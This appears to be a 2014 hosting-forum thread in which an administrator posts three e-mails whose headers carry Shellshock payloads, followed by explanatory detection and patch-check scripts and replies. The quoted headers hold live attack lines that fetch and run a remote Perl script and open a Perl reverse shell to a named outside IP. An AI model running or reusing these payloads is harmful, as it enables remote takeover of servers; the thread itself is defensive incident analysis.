
Some strange e-mails from Server - hack attempt?

ffischer

Basic Pleskian
Hi,
Today I got some e-mails from my server.
Don't know what this can be;
I searched the whole server but found nothing.

These are the messages in the mails:

Mail 1:

Code:
Delivered-To: [email protected]
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
    by freaky-media.de (Postfix) with ESMTP id D02C4621410
    for <root>; Fri, 24 Oct 2014 11:25:36 +0200 (CAT)
To: () { :; }; wget 185.10.58.181/VULNERABLE;
References: () { :; }; wget 185.10.58.181/VULNERABLE;
Cc: () { :; }; wget 185.10.58.181/VULNERABLE;
From: () { :; }; wget 185.10.58.181/VULNERABLE;
Subject: () { :; }; wget 185.10.58.181/VULNERABLE;
Date: () { :; }; wget 185.10.58.181/VULNERABLE;
Message-ID: () { :; }; wget 185.10.58.181/VULNERABLE;
Comments: () { :; }; wget 185.10.58.181/VULNERABLE;
Keywords: () { :; }; wget 185.10.58.181/VULNERABLE;
Resent-Date: () { :; }; wget 185.10.58.181/VULNERABLE;
Resent-From: () { :; }; wget 185.10.58.181/VULNERABLE;


Mail 2:
Code:
Return-Path: <[email protected]>
X-Original-To: root@localhost
Delivered-To: [email protected]
Received: by freaky-media.de (Postfix)
    id 73690621464; Fri, 24 Oct 2014 11:59:34 +0200 (CAT)
Delivered-To: root@localhost
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
    by freaky-media.de (Postfix) with SMTP id 0A054621410
    for <root@localhost>; Fri, 24 Oct 2014 11:59:33 +0200 (CAT)
To: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
References: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Cc: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
From: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Subject: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Date: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Message-ID: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Comments: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Keywords: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Resent-Date: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Resent-From: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;

Mail 3:
Code:
Return-Path: <[email protected]>
X-Original-To: root@localhost
Delivered-To: [email protected]
Received: by freaky-media.de (Postfix)
    id 06940621468; Fri, 24 Oct 2014 12:36:43 +0200 (CAT)
Delivered-To: root@localhost
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
    by freaky-media.de (Postfix) with SMTP id 806DD621467
    for <root@localhost>; Fri, 24 Oct 2014 12:36:42 +0200 (CAT)
To: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
References: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Cc: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
From: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Subject: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Date: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Message-ID: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Comments: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Keywords: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Resent-Date: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Resent-From: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';

Anyone have any ideas?

best regards
Frank
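The three mails above all carry the same shape: every addressable header (To, From, Subject, ...) starts with an empty bash function body `() { :; };` followed by a command. That is the CVE-2014-6271 ("Shellshock") trigger: a bash that imports functions from the environment would run whatever follows the closing brace if some program on the delivery path copies header values into its environment before spawning a shell. The commands escalate from a plain download marker (Mail 1) to a Perl downloader (Mail 2) to an inline Perl reverse shell to port 25 (Mail 3). The script below is an added example, not part of the thread: it takes a raw message, reports which headers are poisoned, and pulls out the IPs the payloads reach for, which is what you would feed to a firewall or a log search. The sample message is constructed from the header lines of Mail 2 plus one harmless header; it needs only POSIX sh with grep, sed, sort and awk.

```shell
#!/bin/sh
# Added example (not from the thread): flag Shellshock-style e-mail headers and
# extract the attacker infrastructure they reference.

# Constructed sample: the Received and two payload headers from Mail 2 in the
# thread, plus one clean header to show it is not matched.
SAMPLE_MAIL="$(cat <<'EOF'
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
    by freaky-media.de (Postfix) with SMTP id 0A054621410
    for <root@localhost>; Fri, 24 Oct 2014 11:59:33 +0200 (CAT)
To: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Subject: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
X-Mailer: harmless client 1.0
EOF
)"

# The CVE-2014-6271 trigger: a header whose value begins with an empty function
# definition "() { ... };" and then continues with an arbitrary command.
SHELLSHOCK_RE='^[A-Za-z0-9-]+:[[:space:]]*\(\)[[:space:]]*\{[^}]*\};'

# Names of the poisoned headers, one per line.
shellshock_headers() {
    printf '%s\n' "$1" | grep -E "$SHELLSHOCK_RE" \
        | sed -E 's/^([A-Za-z0-9-]+):.*/\1/'
}

# Number of poisoned headers (0 for a clean message); awk keeps exit status 0.
shellshock_count() {
    shellshock_headers "$1" | awk 'END { print NR }'
}

# Unique IPv4 addresses used inside the payloads (download hosts, callback
# targets). The SMTP client address lives in Received: and is excluded here.
shellshock_iocs() {
    printf '%s\n' "$1" | grep -E "$SHELLSHOCK_RE" \
        | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
}

# Connecting client from the first Received: line, the host that sprayed us.
smtp_client_ip() {
    printf '%s\n' "$1" | grep -m1 '^Received: from' \
        | grep -oE '\[([0-9]{1,3}\.){3}[0-9]{1,3}\]' | sed 's/[][]//g'
}

# Stand-alone demo over the constructed sample.
printf 'poisoned headers: %s\n' "$(shellshock_count "$SAMPLE_MAIL")"
shellshock_headers "$SAMPLE_MAIL" | sed 's/^/  /'
printf 'payload IPs:\n'
shellshock_iocs "$SAMPLE_MAIL" | sed 's/^/  /'
printf 'sending client: %s\n' "$(smtp_client_ip "$SAMPLE_MAIL")"
```

To run it over real mail, replace `SAMPLE_MAIL` with `$(cat /path/to/message)` or feed each file from the queue or a Maildir through the functions; a non-zero `shellshock_count` on inbound mail is a reliable signal, since no legitimate client puts `() {` at the start of a header value. Note that the payloads only fire if something between Postfix and the mailbox exports header values into the environment of a command (a procmail recipe, a pipe-based filter, a script that hands headers to bash); Postfix itself does not do that, so finding the mails in root's mailbox, as here, does not by itself mean anything executed.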
 
Maybe someone tried to get in with the Shellshock bug.
A test directly in the shell gives me:

Code:
root@freaky-media:~# curl https://shellshocker.net/shellshock_test.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2627  100  2627    0     0   4243      0 --:--:-- --:--:-- --:--:--  4250
CVE-2014-6271 (original shellshock): not vulnerable
CVE-2014-6277 (segfault): not vulnerable
CVE-2014-6278 (Florian's patch): not vulnerable
CVE-2014-7169 (taviso bug): not vulnerable
CVE-2014-7186 (redir_stack bug): not vulnerable
CVE-2014-7187 (nested loops off by one): not vulnerable
CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable


So the code above does not work :)
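Piping a remote script into bash, as in the test above, is itself something to avoid on a production box; the same checks are short enough to keep locally. The script below is an added example, not from the thread or from shellshocker.net: it runs the two best-known probes (the original CVE-2014-6271 function-import test and the CVE-2014-7169 parser follow-up, which on a half-patched bash creates a file named `echo` in the working directory) against whichever `bash` is on PATH, prints a line per check and returns non-zero if either trips, so it can run from cron or a configuration tool. It assumes a POSIX `/bin/sh` and `mktemp`.

```shell
#!/bin/sh
# Added example (not from the thread): local Shellshock probes against the
# system bash, usable from cron. Exit status 0 = clean, 1 = patch bash now.

# Bash under test; override with BASH_BIN=/path/to/bash. Empty if no bash.
BASH_BIN="${BASH_BIN:-$(command -v bash 2>/dev/null || true)}"

# CVE-2014-6271: an exported function definition must not carry trailing
# commands into execution when bash imports it from the environment.
check_cve_2014_6271() {
    [ -n "$BASH_BIN" ] || { echo "no bash"; return 0; }
    out=$(env X='() { :;}; echo vulnerable' "$BASH_BIN" -c : 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "not vulnerable" ;;
    esac
}

# CVE-2014-7169: the first fix left a parser bug; the crafted import below
# turns "echo date" into a redirection that creates a file named "echo".
# Run in a scratch directory so a vulnerable bash cannot clobber anything.
check_cve_2014_7169() {
    [ -n "$BASH_BIN" ] || { echo "no bash"; return 0; }
    tmp=$(mktemp -d) || return 1
    ( cd "$tmp" && env X='() { (a)=>\' "$BASH_BIN" -c "echo date" >/dev/null 2>&1 ) || true
    if [ -e "$tmp/echo" ]; then echo "vulnerable"; else echo "not vulnerable"; fi
    rm -rf "$tmp"
}

# Report both checks; non-zero exit when any of them trips.
shellshock_status() {
    r1=$(check_cve_2014_6271)
    r2=$(check_cve_2014_7169)
    printf 'CVE-2014-6271 (function import):   %s\n' "$r1"
    printf 'CVE-2014-7169 (parser follow-up):  %s\n' "$r2"
    if [ "$r1" = vulnerable ] || [ "$r2" = vulnerable ]; then
        echo "RESULT: bash is exploitable, patch it now"
        return 1
    fi
    echo "RESULT: bash is not exploitable by these two vectors"
}

shellshock_status
```

A clean result here says only that the bash binary is patched. It says nothing about whether any program on the mail path would have handed those header values to bash in the first place, which is the question the mails raise.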
 
Are you using "Joomla" or "Mambo" on your server and probably have extensions using the exploit "mosConfig_absolute_path"? With this exploit it is possible to add additional remote files within a link, as shown in your quotes from Mail no. 2.
To prevent this exploit from working, please turn on ModSecurity, and still consider removing the source or the complete extension from your server. Make sure to use only sources and extensions from official servers, because they mostly check sources and extensions before releasing them. Sometimes theme templates have security holes or exploits as well, so it is wise to check the code before using it.
 
Yes, some domains have Joomla on them.
ModSecurity on the Plesk server is ON; it was activated before the hack started.

I searched the whole server for files that have "e.txt;perl" in them,
but actually I only found the mails that contain this text.
 
Hi ffischer,

you might have misunderstood something here... the remote file might or might not be on YOUR server. Please check the corresponding articles on that exploit, using Google and co. for a search.
 